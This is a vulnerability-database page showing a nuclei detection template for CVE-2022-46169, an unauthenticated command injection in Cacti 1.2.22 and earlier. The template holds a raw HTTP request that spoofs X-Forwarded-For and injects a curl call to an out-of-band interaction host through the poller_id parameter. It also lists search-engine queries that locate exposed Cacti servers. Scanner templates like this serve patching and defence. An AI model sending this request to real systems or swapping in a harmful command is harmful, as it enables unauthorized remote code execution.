Lucene search
K

Cacti <=1.2.22 - Remote Command Injection

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 197 Views

Cacti <=1.2.22 - Remote Command Injection, allows unauthorized OS command executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Incorrect Authorization in Cacti
1 May 202314:29
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
1 Apr 202319:20
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
21 May 202306:43
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
1 May 202314:29
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
11 Mar 202319:39
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
13 Jan 202305:37
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
1 May 202320:00
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
8 Dec 202201:52
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
4 May 202321:21
githubexploit
GithubExploit
Exploit for Incorrect Authorization in Cacti
16 Dec 202216:16
githubexploit
Rows per page
id: CVE-2022-46169

info:
  name: Cacti <=1.2.22 - Remote Command Injection
  author: Hardik-Solanki,j4vaovo
  severity: critical
  description: |
    Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.
  reference:
    - https://security-tracker.debian.org/tracker/CVE-2022-46169
    - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
    - https://www.cybersecurity-help.cz/vdb/SB2022121926
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46169
    - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-46169
    cwe-id: CWE-78,CWE-74
    epss-score: 0.99826
    epss-percentile: 0.99958
    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cacti
    product: cacti
    shodan-query:
      - title:"Login to Cacti"
      - http.title:"login to cacti"
      - http.title:"cacti"
      - http.favicon.hash:"-1797138069"
    fofa-query:
      - icon_hash="-1797138069"
      - title="cacti"
      - title="login to cacti"
    google-query:
      - intitle:"cacti"
      - intitle:"login to cacti"
  tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth,vkev,vuln
variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1

    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"value":'
          - '"local_data_id":'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"

      - type: status
        status:
          - 200
# digest: 490a0046304402207e0174f02f33fe60c305931574841a6a9449a046ac99477035361d2e7a33192f02201f99b36c2f2714c5f6de599266c094eb1dd3c64419a2823b83e0af904ecf3214:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9.2High risk
Vulners AI Score9.2
CVSS 3.19.8
EPSS0.99826
SSVC
197